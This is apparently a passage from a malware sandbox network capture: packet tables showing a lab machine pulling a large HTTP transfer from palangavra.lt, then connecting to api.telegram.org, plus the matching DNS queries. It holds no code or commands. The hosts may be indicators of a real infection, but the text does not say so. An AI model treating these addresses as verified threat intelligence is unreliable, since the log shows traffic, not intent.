                                                                                Oct 14, 2021 10:22:59.218223095 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218228102 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218261003 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218264103 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218296051 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218302011 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218342066 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218343019 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218384981 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218389034 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218420982 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218429089 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218458891 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218463898 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218497992 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218499899 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218533039 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218542099 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218571901 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218579054 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218609095 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218616962 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218653917 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218655109 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218697071 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218700886 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218733072 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218749046 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218770981 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218775034 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218808889 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218822002 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218846083 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218859911 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218883991 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218892097 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218921900 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.218933105 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218965054 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.218969107 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219011068 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219014883 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219048977 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219053030 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219086885 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219094992 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219132900 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219155073 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219194889 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219204903 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219232082 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219247103 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219269991 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219284058 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219307899 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219315052 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219350100 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219355106 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219396114 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219397068 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219433069 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219441891 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219471931 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219477892 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219531059 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219536066 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219567060 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219573021 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219604015 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219607115 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219640970 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219645023 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219686985 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219687939 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219727993 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219732046 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219763994 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219777107 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219803095 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219805956 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219840050 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219844103 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219875097 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219887018 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219912052 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219924927 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219948053 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.219959974 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219988108 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.219995022 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220036983 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220037937 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220072985 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220083952 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220109940 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220119953 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220146894 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220155001 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220181942 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220194101 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220220089 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220226049 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220256090 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220262051 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220300913 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220303059 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220350981 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220516920 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220566034 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220571995 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220618963 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220730066 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220777988 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220905066 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220943928 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220957994 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.220980883 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.220988035 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221019030 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221055031 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221062899 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221071959 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221092939 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221096039 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221129894 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221144915 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221174002 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221177101 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221216917 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221224070 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221252918 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221278906 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221298933 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221302032 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221328020 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221354961 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221368074 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221379995 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221385002 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221388102 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221414089 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221434116 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221450090 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221450090 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221482992 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221497059 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221513033 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221525908 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221543074 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221554041 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221571922 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221584082 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221600056 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221613884 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221631050 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221641064 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221659899 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221673012 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221697092 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221698999 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221728086 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221735954 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221756935 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221769094 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221786976 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221797943 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221816063 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.221826077 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.221858978 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243601084 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243654966 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243691921 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243710995 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243732929 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243741035 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243746996 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243769884 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243789911 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243817091 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243835926 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243859053 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243865967 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243896008 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243910074 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243935108 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243940115 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.243972063 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.243984938 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244009018 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244021893 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244046926 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244055033 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244085073 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244098902 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244131088 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244134903 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244216919 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244221926 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244252920 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244261026 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244296074 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244299889 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244339943 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244347095 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244376898 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244385958 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244415045 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244421959 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244452000 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244458914 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244488001 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244502068 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244528055 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244530916 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244575024 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244905949 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244954109 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244970083 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.244995117 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.244998932 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245033979 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245071888 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245095968 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245110035 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245127916 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245136976 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245146036 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245153904 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245182991 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245198011 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245220900 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245235920 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245261908 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245266914 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245309114 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245313883 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245345116 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245354891 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245383024 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245388985 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245419979 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245429039 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245455027 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245476007 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245492935 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245497942 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245531082 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245546103 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245578051 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245590925 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245619059 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245629072 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245656013 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245672941 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245693922 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245697021 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245731115 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245740891 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245767117 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245781898 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245807886 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245853901 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245903015 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245910883 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.245978117 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.245979071 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246028900 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246093035 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246141911 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246202946 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246253967 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246289015 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246325970 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246339083 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246371984 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246390104 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246414900 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246432066 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246453047 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246479988 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246500969 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246520996 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246530056 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:22:59.246553898 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246582031 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.246753931 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:22:59.247596025 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:23:04.194571972 CEST8049167144.76.47.167192.168.2.22
                                                                                Oct 14, 2021 10:23:04.194775105 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:23:27.091092110 CEST4916780192.168.2.22144.76.47.167
                                                                                Oct 14, 2021 10:24:56.311146975 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.311184883 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.311368942 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.323960066 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.323987007 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.392973900 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.393135071 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.410365105 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.410413980 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.410795927 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.615189075 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.618835926 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.786638975 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.813334942 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.817281008 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.859139919 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.915749073 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.915889978 CEST44349169149.154.167.220192.168.2.22
                                                                                Oct 14, 2021 10:24:56.915997982 CEST49169443192.168.2.22149.154.167.220
                                                                                Oct 14, 2021 10:24:56.917042971 CEST49169443192.168.2.22149.154.167.220

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 14, 2021 10:22:58.987952948 CEST5216753192.168.2.228.8.8.8
                                                                                Oct 14, 2021 10:22:59.023015022 CEST53521678.8.8.8192.168.2.22
                                                                                Oct 14, 2021 10:24:56.252165079 CEST5059153192.168.2.228.8.8.8
                                                                                Oct 14, 2021 10:24:56.270032883 CEST53505918.8.8.8192.168.2.22
                                                                                Oct 14, 2021 10:24:56.270914078 CEST5059153192.168.2.228.8.8.8
                                                                                Oct 14, 2021 10:24:56.289134979 CEST53505918.8.8.8192.168.2.22

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Oct 14, 2021 10:22:58.987952948 CEST192.168.2.228.8.8.80x8ff9Standard query (0)palangavra.ltA (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.252165079 CEST192.168.2.228.8.8.80x3162Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                                Oct 14, 2021 10:24:56.270914078 CEST192.168.2.228.8.8.80x3162Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Oct 14, 2021 10:22:59.023015022 CEST8.8.8.8192.168.2.220x8ff9No error (0)palangavra.lt144.76.47.167A (IP address)IN (0x0001)
